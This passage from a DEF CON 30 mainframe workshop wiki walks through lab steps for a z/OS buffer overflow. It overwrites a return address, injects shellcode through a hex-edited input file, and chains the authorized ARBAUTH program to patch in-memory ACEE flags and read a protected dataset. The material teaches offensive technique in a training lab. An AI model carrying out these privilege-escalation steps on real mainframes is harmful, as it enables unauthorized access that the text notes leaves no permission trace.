36 | # Take note of the memory location `09DB40`. This is where the first byte of our input sits in storage, i.e. the address of data we fully control. 37 | # Edit `.OVERFLOW.ARBAUTH(DEBRUIJN)` again and replace `DEADBEEF` with `8009DB40` (the leading `80` is conventional and harmless here, since `BR` only uses the low-order address bits; the branch target is `09DB40`) 38 | 39 | Should look like 40 | [img[Screenshot_2022-07-31_17-14-33.png]] 41 | 42 | # Resubmit `.JCLLIB(LAB07)` and notice we get a different abnormal end: `ABENDED SYSTEM 0C1`. S0C1 is an operation exception: the CPU is now fetching instructions from our input and `C1 81...` is not a valid opcode. We control where execution goes; the next lab puts real code there. -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 8 - Add our own Shell Code.tid: -------------------------------------------------------------------------------- 1 | created: 20220731235446888 2 | modified: 20220805150633882 3 | tags: 4 | title: Lab 8 - Add our own Shell Code 5 | type: text/vnd.tiddlywiki 6 | 7 | !! Assemble and link WTOPOC 8 | 9 | # Open `.JCLLIB(LAB08)` and submit the job 10 | # If you look on line 41 this is where the binary will be placed e.g. `//LKED.SYSLMOD DD DSN=DC00.LOAD(WTOPOC)` means the assembled binary is in `DC00.LOAD(WTOPOC)` 11 | # Using FTP download WTOPOC to your machine: 12 | #* `ftp <host> 2121` 13 | #* sign in with your username and password 14 | #* type `cd <userid>.LOAD` (e.g. `cd DC00.LOAD`), 15 | #* type `bin` for binary download. 16 | #* type `get WTOPOC` to download our assembled binary 17 | # Using FTP also download `.OVERFLOW.ARBAUTH(DEBRUIJN)` 18 | #* `cd ..` to get out of `.LOAD` 19 | #* `cd <userid>.OVERFLOW.ARBAUTH` 20 | #* type `bin` 21 | #* Finally `get DEBRUIJN` 22 | # Open WTOPOC with Okteta (or your hex editor of choice): `okteta WTOPOC` 23 | #* ''Note'' You can read the text in the file by changing the encoding to "EBCDIC 1047" in the bottom right. 24 | # Highlight the hex between the two `CAFEBABE` markers and copy it with `ctrl-c` [img[hexhiighlight.png]] 25 | # Open the de Bruijn file in Okteta: `okteta DEBRUIJN` or File -> Open, highlight the first byte and press `ctrl-v` [img[arbpoc.png]]. Pasting at the first byte puts the code at exactly `09DB40`, the address we placed in the return slot. Make sure the paste overwrites rather than inserts bytes, otherwise the file grows and the 4 bytes that land in R14 shift out of place. 26 | # Save the changes to DEBRUIJN as a new file called `SHELCODE` ⚠️⚠️ ''NOTICE'' ⚠️⚠️ This file name is missing an L on purpose, we have an 8 character limit. 
27 | # Using FTP, upload your changed DEBRUIJN file to `.OVERFLOW.ARBAUTH(SHELCODE)`: 28 | #* Login to FTP and cd to `.OVERFLOW.ARBAUTH` 29 | #* Change to binary mode with `bin` 30 | #* upload the file with `put SHELCODE`. 31 | 32 | !! Submitting our exploit 33 | 34 | # Edit `.JCLLIB(LAB07)` and replace `DEBRUIJN` on line 12 with `SHELCODE` [img[shellcodejcl.png]] 35 | # SAVE your changes and SUBMIT the job. It will still abend with `C03`, but that's okay: the payload runs before the abend. 36 | #* If it abends with anything else go back to the previous step and make sure you uploaded the files as ⚠️⚠️''binary''⚠️⚠️ (an ASCII-mode transfer silently translates the bytes and destroys the shell code) 37 | 38 | !! Did it work?! 39 | 40 | # Open the joblog by typing `=3.8` in the command bar, and limit it to your userid with `ST` followed by your user ID. 41 | # Find the LAB07 output with the highest `JOB000##` number, and put an `S` in the S column in front of it. 42 | # Notice that our shell code was successfully executed as the joblog contains `+WTO HAS RUN! ` 43 | 44 | [img[Screenshot_2022-07-31_23-23-29.png]] 45 | 46 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Lab 9 - Privesc with ARBAUTH.tid: -------------------------------------------------------------------------------- 1 | created: 20220801062422765 2 | modified: 20220805162959463 3 | tags: 4 | title: Lab 9 - Privesc with ARBAUTH 5 | type: text/vnd.tiddlywiki 6 | 7 | [img[Screenshot_2022-07-31_23-34-15.png]] 8 | 9 | If you've explored at all on the system you'll know there's a dataset called `WHITE.RABBIT`. Did you try to access it? What happens when you try to read `SCRIPT` in that dataset? If you try to ''E''dit or ''V''iew that dataset you will get access denied! Bummer! 10 | 11 | Despite OPENTST being in an APF-authorized library, it wasn't linked with `AC=1`, which means it still can't run authorized! Our shell code so far runs with nothing more than our own permissions. 12 | 13 | [img[opentstac0.png]] 14 | 15 | Luckily we have a program in `SYS2.LINKLIB` that can help us: ''ARBAUTH''. 
ARBAUTH lets us name a program and it will run it as if it were `AC=1`, i.e. with APF authorization. This is the real weakness being chained here: ARBAUTH is an authorized program that transfers control to a module chosen by its caller, and authorization is an attribute of the job step rather than of the module, so everything that program does, including code reached through a memory-corruption bug in it, runs authorized. An unauthorized program with an overflow (OPENTST) becomes an authorized code-execution primitive the moment an authorized caller invokes it, which is why APF libraries are supposed to hold only code that has been reviewed for exactly this class of bug. 18 | 19 | !! Running ARBAUTH 20 | 21 | # Open lab 9: `.JCLLIB(LAB09)` and SUBMIT the job 22 | # You should get a max return code of `0000` 23 | 24 | !! Running Opentst with ARBAUTH 25 | 26 | # Open lab 10: `.JCLLIB(LAB10)` and SUBMIT the job 27 | # Whoa, we get an even stranger completion code, `SYSTEM=53E`; don't worry, we can ignore it 28 | # Look at the job log and see that our WTO shell code ran just fine, this time under an authorized caller 29 | 30 | [img[arbauthwto.png]] 31 | 32 | !! Prep for Privesc 33 | 34 | Now we're going to use ARBAUTH and the overflow in OPENTST to change our permissions and follow the WHITE.RABBIT 35 | 36 | # Submit the job `.JCLLIB(LAB11)`. This generates shell code that changes the job's ACEE (accessor environment element, the in-storage security control block built for the address space at logon/job start) by setting flag byte 1 to `10110001`. In RACF's ACEEFLG1 layout those bits are SPECIAL, OPERATIONS, AUDITOR and "defined to RACF"; OPERATIONS in particular grants access to data sets regardless of their profiles, which is what will let the next step read `WHITE.RABBIT`. Only the in-memory copy is patched: the security database is unchanged, so the elevation lasts just for this job and leaves no permission change behind, which is also why such an attack is invisible to a permissions review and only shows up in access logging, if any. Writing to the ACEE is possible only because the code is now running authorized. 37 | # Using FTP download the file `.LOAD(ACEEJOB)`. 38 | # Open both DEBRUIJN and ACEEJOB with Okteta: `okteta DEBRUIJN & okteta ACEEJOB` 39 | # Copy all bytes between the two `CAFEBABE` markers from ACEEJOB and paste them starting at the first byte in `DEBRUIJN` (overwrite, don't insert). 40 | # Save this file as `PRIVESC` 41 | # Using FTP upload this file as ⚠️⚠️binary⚠️⚠️ to `.OVERFLOW.ARBAUTH(PRIVESC)` 42 | #* `cd .OVERFLOW.ARBAUTH` 43 | #* `bin` 44 | #* `PUT PRIVESC` 45 | 46 | !! Exploit 47 | 48 | # Open the file `.JCLLIB(LAB12)` in the ISPF editor. 49 | #* Notice there are two steps, the ARBAUTH step `//ARBAUTH EXEC PGM=ARBAUTH, ` and the read step `//STEP01 EXEC PGM=IEBGENER,COND=EVEN`. 50 | #** Step 1: PRIVESC [img[privesc.png]] 51 | #** Step 2: Read the file we shouldn't [img[whiterabbit.png]] 52 | #* If you look at the JCL for `STEP01` you'll see `//SYSUT1 DD DSN=WHITE.RABBIT(SCRIPT),DISP=SHR`. 53 | #* This is the file that IEBGENER is going to read and output to the joblog. `COND=EVEN` makes this step run even though the ARBAUTH step abends, and because the ACEE belongs to the job's address space rather than to one step, the patched flags are still in effect when IEBGENER opens the dataset. 54 | # Submit this job, it will also abend 55 | # Look at the job log, you should see `WRITING COMPLETE`. This means we successfully changed our ACEE! 56 | # Scroll down and notice you now have the contents of `WHITE.RABBIT(SCRIPT)` available to you! 
57 | 58 | [img[Screenshot_2022-08-01_00-06-05.png]] 59 | -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-18.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-18.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220724193849044 2 | modified: 20220801071843956 3 | title: Screenshot_2022-07-24_12-32-18.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-44.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-44.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-32-44.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220724193835928 2 | modified: 20220801071844323 3 | title: Screenshot_2022-07-24_12-32-44.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-41-23.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-41-23.png 
-------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-24_12-41-23.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220724194138027 2 | modified: 20220801071844505 3 | title: Screenshot_2022-07-24_12-41-23.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-06-42.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-06-42.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-06-42.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731180732190 2 | modified: 20220801071845233 3 | title: Screenshot_2022-07-31_11-06-42.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-32-55.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-32-55.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-32-55.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731183322789 2 | modified: 20220801071845268 3 | title: Screenshot_2022-07-31_11-32-55.png 4 | type: image/png -------------------------------------------------------------------------------- 
/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-40-25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-40-25.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-40-25.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731184049897 2 | modified: 20220801071845294 3 | title: Screenshot_2022-07-31_11-40-25.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-50-09.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-50-09.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_11-50-09.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731185021868 2 | modified: 20220801071845331 3 | title: Screenshot_2022-07-31_11-50-09.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-00-00.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-00-00.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-00-00.png.meta: 
-------------------------------------------------------------------------------- 1 | created: 20220731190014322 2 | modified: 20220801071845358 3 | title: Screenshot_2022-07-31_12-00-00.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-05-20.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-05-20.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_12-05-20.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731190532938 2 | modified: 20220801071845417 3 | title: Screenshot_2022-07-31_12-05-20.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_14-59-18.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_14-59-18.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_14-59-18.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731215927735 2 | modified: 20220801071845452 3 | title: Screenshot_2022-07-31_14-59-18.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-01-47.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-01-47.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-01-47.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731220211970 2 | modified: 20220801071845527 3 | title: Screenshot_2022-07-31_15-01-47.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-25-34.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-25-34.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_15-25-34.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220731222544275 2 | modified: 20220801071845636 3 | title: Screenshot_2022-07-31_15-25-34.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-01-06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-01-06.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-01-06.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801000125535 2 | modified: 20220801071845759 3 | 
title: Screenshot_2022-07-31_17-01-06.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-14-33.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-14-33.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-14-33.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801001458590 2 | modified: 20220801071845891 3 | title: Screenshot_2022-07-31_17-14-33.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-36-55.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-36-55.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_17-36-55.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801053344737 2 | modified: 20220801071845923 3 | title: Screenshot_2022-07-31_17-36-55.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-23-29.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-23-29.png 
-------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-23-29.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801062401019 2 | modified: 20220801071845956 3 | title: Screenshot_2022-07-31_23-23-29.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-34-15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-34-15.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-07-31_23-34-15.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801063425108 2 | modified: 20220801071845991 3 | title: Screenshot_2022-07-31_23-34-15.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_00-06-05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_00-06-05.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_00-06-05.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801070620408 2 | modified: 20220801071846020 3 | title: Screenshot_2022-08-01_00-06-05.png 4 | type: image/png -------------------------------------------------------------------------------- 
/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-21-12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-21-12.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-21-12.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801162155693 2 | modified: 20220801162155693 3 | title: Screenshot_2022-08-01_09-21-12.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-28-19.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-28-19.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_09-28-19.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801162842229 2 | modified: 20220801162842229 3 | title: Screenshot_2022-08-01_09-28-19.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-56-25.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-56-25.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-56-25.png.meta: 
-------------------------------------------------------------------------------- 1 | created: 20220801235710670 2 | modified: 20220801235710670 3 | title: Screenshot_2022-08-01_16-56-25.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-58-16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-58-16.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_16-58-16.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220801235825095 2 | modified: 20220801235825095 3 | title: Screenshot_2022-08-01_16-58-16.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-13-16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-13-16.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-13-16.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802001330830 2 | modified: 20220802001330830 3 | title: Screenshot_2022-08-01_17-13-16.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-48-30.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-48-30.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-48-30.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802004840227 2 | modified: 20220802004840227 3 | title: Screenshot_2022-08-01_17-48-30.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-55-01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-55-01.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-55-01.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802005512140 2 | modified: 20220802005512140 3 | title: Screenshot_2022-08-01_17-55-01.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-56-51.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-56-51.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-01_17-56-51.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220802005703770 2 | modified: 20220802005703770 3 | 
title: Screenshot_2022-08-01_17-56-51.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-03_16-17-06.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-03_16-17-06.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-03_16-17-06.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220803231739573 2 | modified: 20220803231739573 3 | title: Screenshot_2022-08-03_16-17-06.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-04_15-46-24.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-04_15-46-24.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Screenshot_2022-08-04_15-46-24.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220804224638326 2 | modified: 20220804224638326 3 | title: Screenshot_2022-08-04_15-46-24.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/Welcome DEF CON 30!.tid: -------------------------------------------------------------------------------- 1 | created: 20220801070736633 2 | modified: 20220805060439649 3 | tags: 4 | title: Welcome DEF CON 30! 
5 | type: text/vnd.tiddlywiki 6 | 7 | [img[title.jpg]] 8 | 9 | Welcome to the DEF CON 30 Mainframe buffer overflow workshop. Below are the labs for the class. Feel free to skip ahead but we won't help you if you get stuck. 10 | 11 | The labs below walk through a simple buffer overflow on a C program, a buffer overflow on an APF authorized program and using ARBAUTH to do privesc and a remote code execution overflow with EBCDIC to ASCII challenges. To do these labs you'll need at a minimum: 12 | 13 | * A tn3270 client. One is included with this course container at https://localhost:8443 or https://dc30.soldieroffortran.org:8443, the secret is `D3FC0N`. Other good options include x3270, c3270 or pw3270. 14 | * A hex editor, the class uses Okteta 15 | * A command line FTP client 16 | * Python 3 17 | * A web browser 18 | * A rexx script interpreter. Windows available here https://regina-rexx.sourceforge.io/ on Linux and MacOS you should be able to install this with your package manager of choice. e.g. 
`sudo apt install regina-rexx` 19 | * An open mind -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbauthwto.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/arbauthwto.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbauthwto.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805151712219 2 | modified: 20220805151712219 3 | title: arbauthwto.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbpoc.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/arbpoc.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/arbpoc.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805144928761 2 | modified: 20220805144928761 3 | title: arbpoc.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/clistaddress.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/clistaddress.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/clistaddress.png.meta: -------------------------------------------------------------------------------- 1 | created: 
20220805164544999 2 | modified: 20220805164544999 3 | title: clistaddress.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/dataset user.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/dataset user.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/dataset user.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805063959287 2 | modified: 20220805063959287 3 | title: dataset user.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/debruijnrexx.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/debruijnrexx.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/debruijnrexx.png.meta: -------------------------------------------------------------------------------- 1 | created: 20220805071129932 2 | modified: 20220805071129932 3 | title: debruijnrexx.png 4 | type: image/png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/denied.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mainframed/DC30_Workshop/802a7d3dd0d6dbe62f270e4bca6d436709ad63c5/wiki/tiddlywiki/mywiki/tiddlers/denied.png -------------------------------------------------------------------------------- /wiki/tiddlywiki/mywiki/tiddlers/denied.png.meta: 
